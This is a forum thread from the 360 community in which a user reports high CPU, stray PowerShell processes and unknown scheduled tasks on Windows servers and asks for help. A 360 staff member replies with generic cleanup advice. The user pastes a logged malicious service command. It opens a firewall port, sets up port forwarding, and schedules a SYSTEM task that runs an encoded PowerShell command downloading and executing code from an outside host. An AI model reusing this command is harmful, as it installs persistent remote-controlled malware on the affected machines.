关闭

绑定手机号

应国家法规对于账号实名的要求,请您在进行下一步操作前,需要先完成手机绑定 (若绑定失败,请重新登录绑定)。了解更多

不绑定绑定手机号

360官网 | 会员商城 | 360手机官网 | 社区客户端

推荐 论坛 版块 活动 众测 会员商城
近日发现windows07、08、12的CPU总是莫民奇妙的100%,任务管理器中发现了很多cmd.exe和powershell.exe的进程。
通过360杀毒,检测到了powershell异常,并进行了处理。
第二天发现任务管理器中依然很多cmd.exe和powershell.exe的进程,就去检查了任务计划程序,均发现有未知的任务。目前已将未知任务删除。
且打开任务计划程序时都会提示错误:

360社区

360社区




而后在windows系统日志中发现了如下日志:

服务已安装在系统中。

服务名称: SBAQTNHEGSJXNAGBMXOC
服务文件名: %COMSPEC% /C "netsh.exe firewall add portopening tcp 65530 DNS&netsh interface portproxy add v4tov4 listenport=65530 connectaddress=1.1.1.1 connectport=53&schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn  "\Microsoft\windows\Rass" /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZABkAHAALgBuAGUAdAAvAHcAbQA/AGgAZABwACcAKQA=" /F &schtasks /run /tn "\Microsoft\windows\Rass""
服务类型: 用户模式服务
服务启动类型: 按需启动
服务帐户: LocalSystem


共 1 个关于近日电脑疑似遇到攻击,请教下。的回复 最后回复于 2019-5-15 16:39

评论

直达楼层

360工作人员-驱动哥 产品答疑师 发表于 2019-5-15 16:39 | 显示全部楼层 | 私信
您好, 建议您移除信任区的所有文件然后进行全盘查杀,避免此病毒感染其他可执行文件。下载文件的时候建议从软件管家下下载或者从官网下载。电脑随时开启360安全卫士,有病毒木马等文件的时候卫士会第一时间通知您。感谢您的支持!
您需要登录后才可以回帖 登录 | 注册

本版积分规则

360fans493988205 LV1.上等兵

粉丝:1 关注:0 积分:16

精华:0 金币:6 经验:17

最后登录时间:2019-05-17

私信 加好友

360fans493988205

粉丝:1 关注:0

私信

最新活动

第二期吐槽交流会邀您莅临!

排行榜

热度排行 查看排行
今日 本周 本月 全部
    今日 本周 本月 全部

      内容推荐 热门推荐最新主帖

        更多精彩扫码关注:360粉丝团

        快速回复 返回顶部 返回列表